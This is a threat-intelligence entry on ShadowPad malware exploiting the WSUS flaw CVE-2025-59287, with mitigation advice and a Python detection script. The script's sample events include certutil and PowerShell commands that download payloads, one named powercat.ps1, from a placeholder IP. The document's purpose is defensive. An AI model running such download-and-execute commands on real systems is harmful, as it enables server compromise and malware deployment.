ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute a malware known as ShadowPad. "The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access," AhnLab Security Intelligence Center (ASEC) said in a report published last week. "They then used PowerCat, an open-source
AI Analysis
Technical Summary
The ShadowPad malware campaign exploits a recently patched critical vulnerability in Microsoft Windows Server Update Services (WSUS), identified as CVE-2025-59287, which is a deserialization flaw allowing remote code execution with system-level privileges. WSUS is a Windows Server role used to manage and distribute updates within enterprise environments. The vulnerability enables attackers to send crafted requests to WSUS servers, triggering deserialization of malicious data and executing arbitrary code.

In documented attacks, threat actors first exploit this flaw to gain initial access to WSUS-enabled Windows Servers. They then leverage PowerCat, an open-source PowerShell-based Netcat utility, to establish a command shell on the compromised system. Subsequently, they use legitimate Windows tools such as certutil and curl to download and install ShadowPad malware.

ShadowPad is a sophisticated modular backdoor, a successor to PlugX, known for its use by Chinese state-sponsored groups in espionage operations. It employs DLL side-loading by abusing a legitimate binary (ETDCtrlHelper.exe) to load a malicious DLL (ETDApix.dll) into memory, which acts as a loader for the backdoor and its plugins. The malware includes anti-detection and persistence mechanisms, allowing attackers to maintain long-term access and execute various payloads.

The exploitation of CVE-2025-59287 has surged following public release of proof-of-concept exploit code, with attackers weaponizing it to compromise publicly exposed WSUS servers. Besides ShadowPad, attackers have also used the vulnerability to deploy legitimate tools like Velociraptor for reconnaissance. The criticality of this vulnerability lies in its ability to grant system-level remote code execution without authentication, making it a high-risk vector for enterprise compromise.
Potential Impact
For European organizations, the exploitation of CVE-2025-59287 poses a significant threat to the confidentiality, integrity, and availability of critical IT infrastructure. WSUS servers are often central to patch management and software update distribution; compromise can lead to widespread malware deployment and lateral movement within networks. ShadowPad’s modular architecture and persistence capabilities enable attackers to conduct espionage, data exfiltration, and potentially disrupt operations. Organizations relying on WSUS for update management may face prolonged undetected intrusions, risking intellectual property theft and operational disruption. The use of legitimate Windows utilities in the attack chain complicates detection and response efforts. Additionally, the exposure of WSUS servers to the internet increases the attack surface, making public-facing update servers prime targets. The impact extends to regulatory compliance risks under GDPR if personal data is compromised. The threat also undermines trust in update infrastructure, potentially delaying critical patch deployments and increasing vulnerability to other threats.
Mitigation Recommendations
European organizations should immediately apply the official Microsoft patch addressing CVE-2025-59287 to all WSUS servers. Network segmentation should be enforced to isolate WSUS servers from direct internet exposure; WSUS should not be publicly accessible unless absolutely necessary. Implement strict firewall rules and access controls limiting WSUS communication to trusted internal systems. Monitor for anomalous use of Windows utilities such as certutil, curl, and PowerShell scripts, especially those initiating outbound connections to unknown IP addresses. Deploy endpoint detection and response (EDR) solutions capable of detecting DLL side-loading and memory-resident loaders. Conduct regular audits of WSUS configurations and logs to identify unauthorized changes or suspicious activity. Employ threat hunting focused on indicators of compromise related to ShadowPad, including unusual DLL loads and network traffic to known malicious command and control servers. Educate IT and security teams on the specific attack vectors and tactics used in this campaign. Consider implementing application whitelisting to prevent unauthorized execution of binaries like ETDCtrlHelper.exe with malicious DLLs. Finally, maintain robust backup and incident response plans to quickly recover from potential compromises.
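A worked detection pass for the monitoring guidance above, added here as an example and not code from the ASEC report or the article: it runs two of the recommended checks (download activity by certutil, curl or PowerShell, and ETDCtrlHelper.exe loading ETDApix.dll) over constructed Sysmon-style events. The parent-process rule assumes WSUS runs inside an IIS application pool (worker process w3wp.exe), which the page itself does not state; the IP address is a documentation-range placeholder.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 7 = image load);
# not real telemetry. 203.0.113.10 is a documentation-range placeholder address.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/a.dat a.dat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "certutil -hashfile update.msu SHA256"},  # benign admin use
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell -nop -c Invoke-WebRequest http://203.0.113.10/powercat.ps1 -OutFile pc.ps1"},
    {"EventID": 7, "Image": r"C:\ProgramData\Tools\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\ProgramData\Tools\ETDApix.dll"},
]

URL = re.compile(r"https?://", re.IGNORECASE)
PS_FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|powercat", re.IGNORECASE)
LOLBINS = {"certutil.exe", "curl.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption (not from the page): WSUS serves its API from an IIS application pool,
# so the IIS worker w3wp.exe is the expected parent of a shell spawned by the exploit.
IIS_WORKER = "w3wp.exe"


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event_index, rule, detail) for every event matching a rule."""
    findings = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            img = basename(ev["Image"])
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            if img in LOLBINS and URL.search(cmd):        # certutil/curl fetching from a URL
                findings.append((i, "lolbin_download", img))
            if img in {"powershell.exe", "pwsh.exe"} and PS_FETCH.search(cmd):
                findings.append((i, "powershell_download", img))
            if parent == IIS_WORKER and img in SHELLS:    # web worker spawning a shell
                findings.append((i, "iis_worker_spawned_shell", img))
        elif ev.get("EventID") == 7:
            img, dll = basename(ev["Image"]), basename(ev["ImageLoaded"])
            if img == "etdctrlhelper.exe" and dll == "etdapix.dll":
                findings.append((i, "etdctrlhelper_sideload", ev["ImageLoaded"]))
    return findings
```

The benign certutil hash check at index 1 produces no finding, so the rules key on download behaviour rather than on the utility name alone.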
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden, Switzerland
Technical Details
- Article Source: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html (fetched 2025-11-24, 939 words)
Threat ID: 692420aa3a0ff800317c82bc
Added to database: 11/24/2025, 9:08:58 AM
Last enriched: 11/24/2025, 9:09:15 AM
Last updated: 12/4/2025, 10:03:09 PM